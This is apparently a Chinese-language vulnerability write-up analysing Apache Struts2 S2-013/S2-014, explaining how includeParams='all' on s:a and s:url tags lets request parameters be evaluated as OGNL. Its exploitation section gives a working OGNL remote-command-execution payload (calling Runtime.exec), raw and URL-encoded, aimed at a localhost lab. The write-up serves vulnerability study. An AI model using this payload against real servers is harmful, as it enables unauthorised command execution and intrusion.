前言

首先说点题外话,不感兴趣的师傅可以忽略

之前的S2-008、S2-009和S2-012漏洞形成都是由于一些参数限制不够完全导致(有攻击面的和攻击深度的

但是在分析中,却总感觉有些不尽人意的地方,好像少了点东西。可能还是太菜了,后期会试着补上
目前就不发出来当水文了,感兴趣的师傅可以看下
http://www.kingkk.com/2018/09/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/
http://www.kingkk.com/2018/09/Struts2-命令-代码执行漏洞分析系列-S2-012/

然后才是关于这篇文章的

S2-014是对于S2-013修复不完整的造成的漏洞,会在漏洞修复中提到,所以文本的主要分析的还是S2-013

而且在分析的时候,发现参考网上资料时对于漏洞触发逻辑的一些错误 至少目前我自己是那么认为的:) 具体原因在漏洞分析中有详细说明

漏洞环境根据vulhub修改而来,环境源码地址 https://github.com/kingkaki/Struts2-Vulenv/tree/master/S2-013 感兴趣的师傅可以一起分析下

若有疏漏,还望多多指教。

漏洞信息

https://cwiki.apache.org/confluence/display/WW/S2-013

Both the s:url and s:a tag provide an includeParams attribute.

The main scope of that attribute is to understand whether includes http request parameter or not.

The allowed values of includeParams are:

  1. none - include no parameters in the URL (default)
  2. get - include only GET parameters in the URL
  3. all - include both GET and POST parameters in the URL

A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an URL or A tag , which will cause a further evaluation.

The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.
This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.

struts2的标签中 <s:a><s:url> 都有一个 includeParams 属性,可以设置成如下值

  1. none - URL中包含任何参数(默认)
  2. get - 仅包含URL中的GET参数
  3. all - 在URL中包含GET和POST参数

includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。

此时<s:a><s:url>尝试去解析原始请求参数时,会导致OGNL表达式的执行

漏洞利用

不妨先来看下index.jsp中标签是怎么设置的

<p><s:a id="link1" action="link" includeParams="all">"s:a" tag</s:a></p>
<p><s:url id="link2" action="link" includeParams="all">"s:url" tag</s:url></p>

然后来测试一下最简单payload ${1+1}(记得编码提交 :)

http://localhost:8888/link.action?a=%24%7B1%2b1%7D

就可以看到返回的url中的参数已经被解析成了2

然后命令执行的payload

${#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('calc').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(+new java.lang.String(#d)),#out.close()}

编码后提交

http://localhost:8888/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27calc%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%2bnew%20java.lang.String%28%23d%29%29%2C%23out.close%28%29%7D
点击收藏 | 2 关注 | 2
  • 动动手指,沙发就是你的了!
登录 后跟帖